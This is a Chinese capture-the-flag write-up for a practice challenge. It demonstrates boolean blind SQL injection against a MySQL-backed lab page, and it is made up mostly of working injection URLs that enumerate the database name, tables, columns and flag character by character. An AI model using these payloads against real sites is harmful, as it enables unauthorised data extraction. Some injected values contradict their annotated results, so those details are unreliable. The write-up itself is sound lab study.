時間：2017.9.29

題目鏈接：www.shiyanbar.com/ctf/1909

解題思路：類型為 bool 型的盲注，數據庫為MySQL

1） http://ctf5.shiyanbar.com/web/index_3.php?id=1 and 1=1? ?/? ? 1=2? ? ? ?沒有變化

? ? ? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and '1'='1? ?/? ? '1'='2? ?有變化

得出結論：這是關于bool的盲注

2） http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())>0，這語句老是報錯，我知道是單引號沒閉合，但是不知道該怎么寫，后來就用sqlmap跑了一下，知道了正確的寫法應該是這樣寫的，得出當前數據庫長度為4

?http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())=4 and '1'='1??

報錯

3） http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),1,1))=119? and '1'='1? ——? w? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),2,1))=101? and '1'='1? ? ? ? ——? e http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),3,1))=119? and '1'='1? ? ? ? ——? b http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),4,1))=49 and '1'='1? ? ? ? ? ?——? 1? 得出數據庫名為 web1

4） http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2? and '1'='1? ——? 得出web1數據庫中有2張表

5） http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4? and '1'='1 ——第1張表名長為 4? ? ? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4? and '1'='1 —— 第2張表名長為5

6） 先猜第1張表名

http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102? and '1'='1? ——? f http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108? and '1'='1? ——? l http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97? and '1'='1? ——? a? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103? and '1'='1? ——? g

7） 然后猜解flag表中字段數

http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')=2? and '1'='1? ——? flag 表中只有2個字段

8） 猜解flag 表中2個字段長度

http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=4? and '1'='1? ——? 第1個字段長4? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4? and '1'='1? ——? 第二個字段長2

9） 猜解flag 表中2個字段名稱

http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102? and '1'='1? ——? f? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108? and '1'='1? ——? l

以此類推

10） 猜解數據

都是這樣的步驟，手工注入好繁瑣啊，可以直接用sqlmap，比較快